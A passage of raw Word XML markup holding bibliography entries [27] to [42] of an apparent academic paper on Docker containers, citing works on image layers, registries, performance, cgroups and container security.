                      <w:t xml:space="preserve">, Carlsbad, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1D74B5AD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1786322A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[27] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="123F322D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Skourtis, L. Rupprecht and V. Tarasov, “Carving perfect layers out of docker images,” in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>HotCloud 19</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="47F234AD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="216A72B5" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[28] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0BBF60D3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker, “About storage drivers | Docker Documentation,” docker, [Online]. Available: https://docs.docker.com/storage/storagedriver/. [Accessed 21 July 2020].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4267A524" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="31DBA944" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[29] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="52F95611" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Bhat, “Understanding the Dockerfile,” in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Practical Docker with Python</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>, Springer, 2018, pp. 53-89.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2B1B42B9" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1D371D30" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[30] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="66677C5F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">J. Sparks, “Enabling Docker for HPC,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Concurrency and Computation: Practice and Experience, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 31, no. 16, p. e5018, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="79808EF3" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4FDB707F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[31] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3077A84E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">N. Khandhar and S. Shah, “Docker-The Future of Virtualization,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Journal of Research and Analytical Reviews, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 6, no. 2, pp. 164-167, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="312BA5A2" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="53F8FF94" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[32] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1271C1FC" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">R. Muddinagiri, S. Ambavane and S. Bayas, “Self-Hosted Kubernetes: Deploying Docker Containers Locally with Minikube,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceeding - 1st International Conference on Innovative Trends and Advances in Engineering and Technology, ICITAET 2019, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 239-243, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="27AB6F5F" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="727DFD75" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[33] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="667167E3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. B. Ayed, J. Subercaze, F. Laforest and e. al, “Docker2RDF: Lifting the Docker Registry Hub into RDF,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2017 IEEE World Congress on Services (SERVICES), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 36-39, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0C83C135" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="76DC454F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[34] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7B5BD192" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">N. Mohd, M. Mydin, I. Ismail and e. al, “An Operational View into Docker Registry with Scalability, Access Control and Image Assessment Bukhary ikhwan Ismail Malaysian Institute of Microelectronic Systems An Operational View into Docker Registry with Scalability, Access Control and Image Assessm,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">researchgate, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-5, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2362996C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3597C8C6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[35] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1AFE2874" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker, “Docker Security,” docker, [Online]. Available: https://docs.docker.com/engine/security/. [Accessed 6 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2AC63455" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="18A48F51" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[36] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7C1ACA0C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. M. Joy, “Performance comparison between Linux containers and virtual machines,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Conference Proceeding - 2015 International Conference on Advances in Computer Engineering and Applications, ICACEA 2015, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 342-346, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1F10C407" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="10D27208" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[37] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="746D4584" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">E. Bacis, S. Mutti, S. Capelli and e. el, “DockerPolicyModules: Mandatory Access Control for Docker containers,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2015 IEEE Conference on Communications and NetworkSecurity, CNS 2015, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 749-750, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4356CA18" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="613D09BF" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[38] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7DABCFFB" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">R. Rosen, “Linux containers and the future cloud,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Linux J, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 240, no. 4, pp. 86-95, 2014. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3881BE8B" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7393C292" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[39] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="069C62AA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">K. Oh, J. Park and Y. I. Eom, “Weight-Based Page Cache Management Scheme for Enhancing I/O Proportionality of Cgroups,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2019 IEEE International Conference on Consumer Electronics, ICCE 2019, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-3, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5C3CA840" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6477A978" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[40] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5DAD4BAA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Huang, H. Cui, S. Wen and C. Huang, “Security Analysis and Threats Detection Techniques on Docker Container,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2019 IEEE 5th International Conference on Computer and Communications (ICCC), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1214-1220, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2F252B30" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1E0F83E2" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[41] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="54432667" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Martin, S. Raponi, T. Combe and e. el, “Docker ecosystem – Vulnerability Analysis,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Computer Communications, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 122, no. 6, pp. 30-43, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="6CC395D3" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3FF6AE40" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[42] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7587909C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">H. Zhu and C. Gehrmann, “Lic-Sec: An enhanced AppArmor Docker security profile generator,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Journal of Information Security and Applications, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 61, p. 102924, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="56C14A6D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2657A1E3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[43] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
